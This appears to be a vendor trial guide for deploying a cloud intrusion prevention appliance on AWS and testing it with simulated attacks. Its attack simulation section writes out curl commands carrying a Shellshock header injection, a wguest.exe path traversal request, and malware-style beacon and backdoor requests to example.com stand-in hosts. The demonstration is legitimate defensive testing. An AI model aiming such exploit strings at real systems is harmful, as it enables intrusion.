Quick Network Security trial

Leverage Network Security's comprehensive Intrusion Prevention System (IPS) to actively monitor traffic, and get assistance meeting requirements for PCI 11.4. This quick trial guide provides information on:

  • Deploying Network Security Edge protection to intercept Inbound and Outbound traffic and route it to the Network Security appliance for inspection, using AWS' VPC Ingress routing. Learn more about Edge protection and other deployment options.
  • Creating a web server to simulate a sample cloud environment using a CloudFormation template.

Deploying Protection

Follow the steps below to use the CloudFormation template to create a test stack:

  1. Login to your AWS account.
  2. Click this link to create the CloudFormation stack.
  3. Make appropriate changes to the following parameters:
  4. SSH Key: Learn more about SSH keys in AWS documentation.
  5. C1API Key: Learn more about creating a Cloud One API key.
  6. CIDR: The default setting 0.0.0.0/0 allows anyone on the internet to access to your EC2 instance. Restricting access to your IP address is highly recommended. Learn more about verifying your internet address.
  7. Click Create stack. Allow enough time for the process to complete. The resources below are deployed upon successful stack creation:
Resource Details
VPC CIDR 10.0.0.0/16
Internet Gateway Edge route table association, directing traffic to Network Security instance.
Subnets Protected subnet (10.0.0.0/24)
Inspection subnet (10.0.1.0/24)
Management subnet (10.0.2.0/24)
EC2 Instances Network Security virtual appliance
Linux instance running web server (test environment)
CloudWatch Log group Stores Network Security appliance logs
NAT Gateway Used to manage traffic from the Network Security appliance to Cloud One and AWS.
Route tables N/A
Security groups N/A

The architecture diagram below provides a visualization of a Network Security Edge deployment.


Note:

This demo does not include High Availability components such as SNS topic, CloudWatch alarms or Lambda functions. Use the Get Started Wizard described under Next Steps to enable these resources in your cloud environment.


Attack Simulation

To see your Network Security virtual appliance intercepting attacks in action, you can execute a few simple commands that simulate an attack.

Inbound Attacks

Network Security's virtual appliance provides virtual patching, protecting vulnerable infrastructure against inbound attacks, by sending alerts when ingress traffic matching a known vulnerability is observed. You can perform these attacks from your local host, targeting the web server instance that was deployed with your CloudFormation stack as shown below:

  • 16798: HTTP: GNU Bash HTTP Header Remote Code Execution Vulnerability

From the local host command line shell, execute the following command targeting the web server instance: curl -H "User-Agent: () { :; } ; /bin/eject" http://<web server ip>

The appliance detects suspicious traffic and blocks the request. A log event indicating the successful block of the attack is also generated.

Follow the steps below to view log events:

  1. Navigate to Services > CloudWatch in the AWS portal.
  2. From the left navigation menu, select Logs > Log groups.
  3. In the Log group c1_network_security_logs, open the Log stream ipsBlock_<instanceId>. You will find entries matching each of the filter IDs and descriptions.
Outbound Attacks

Network Security's virtual appliance protects against outbound attacks, by alerting when when egress traffic matching a known vulnerability is observed. To see this in action, run the attack simulation from the web server instance deployed with your CloudFormation stack. Use the login ID 'ec2-user' to Secure Shell (SSH) into the instance using the SSH key specified during deployment.

  • 1292 : HTTP: wguest.exe Exploit

From the local host command line shell, execute the following command targeting the web server instance: curl 'http://www.example.org/server/cgi-bin/wguest.exe?template=c:\boot.ini'

The appliance detects suspicious traffic and blocks the request. A log event indicating the successful block of the attack is also generated.

Outbound Attacks using Malware filters

To efficiently run the outbound attack simulations below, you will need to verify that you have the latest threat intelligence packages installed. To ensure that your threat intelligence system is up to date navigate to Policy > Sync Management on the Network Security home page. Click Sync Manually to download the latest packages. Learn more about Network Security threat intelligence packages.


Note: The appliance relies on up to date threat intelligence information to detect and block attacks, like those simulated below. Ensure that synchronization is complete before proceeding.


Follow the instructions below to run the attack simulation:

Attack Method/Result
25492: HTTP: Trojan-Downloader.Win64.BazarLoader.A Runtime Detection From the web server instance command line shell, execute the following command: curl -H 'User-Agent: sdvntyer' http://www.example.com/api/v88
The appliance detects suspicious traffic and blocks the request. A log event indicating the successful block of the attack is also generated.
34738: HTTP: Backdoor.Shell.Dragonmuddy.A Runtime Detection From the web server instance command line shell, execute the following command: curl 'http://www.example.com/includes/main.php?t=7d4580a3910c54d62b46f24c397c8d59&f=g2&type=cmd&id=D7CB4B6E5A21CA596DE0A7E10059C85E'
The appliance detects suspicious traffic and blocks the request. A log event indicating the successful block of the attack is also generated.
38451: HTTP: Worm.Python.KashmirBlack.A Runtime Detection From the web server instance command line shell, execute the following command: curl -H 'User-Agent: ArcherGhost' -d 'post=eyJkYXRhIjogeyJkb21haW4iOiAiaHR0cDovL3RhcmdldDEyMy5jb20vYXNzZXRzL3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQL3Nzc3AucGhwIiwgInNlcnZlciI6ICIxOTIuMTY4LjEwNy4xOSIsICJ0aXRsZSI6ICJqcSJ9LCAidHlwZSI6ICJzY2FubmVyIn0%3D' http://www.example.com/adeliap/404.php

To view log events follow the instructions referenced above.


Note: It may take a few seconds for the events to propagate to CloudWatch.


To learn more about these attacks, visit Cloud One. Under Network Security, select Policy > Intrusion Prevention Filtering. Enter the filter ID in the search field, to see more details.

Next Steps

Now that you have had a chance to experience the inbound and outbound protection offered by Network Security, take the next steps to protect your cloud infrastructure.

Use the Get Started wizard in the Network Security management interface to begin deployment. This generates a new CloudFormation template that deploys Edge protection in your network using information obtained from your cloud account.

If Edge deployment is not right for your environment, you can also learn more about all the available Network Security deployment options available in AWS.